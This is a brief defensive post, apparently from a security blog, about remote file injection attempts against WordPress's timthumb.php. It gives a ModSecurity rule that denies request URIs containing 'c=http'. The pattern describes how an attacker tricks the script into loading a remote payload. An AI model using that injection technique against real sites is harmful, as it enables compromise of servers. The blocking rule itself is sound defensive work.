Timthumb.php hack attempts


Timthumb.php hack attempts

Hackers are targeting WordPress for hack attempts by focusing on a ‘timthumb.php’ file. Here is an example of a request.

What is Timthumb?

TimThumb is an Image Resize for WordPress.

Offending IP:


How to block it?

If you have ModSecurity on your Apache/Cpanel server, an easy way to stop this nonsense is by using this rule.

#Timthumb injection rule created by 0sw.com
SecRule REQUEST_URI "c=http" "deny,log,msg:'File Injection Attempt',status:406"

This will return a 406 Not Allowed Server Response when someone attempts to trick a php file to remotely load a payload using “src=http”.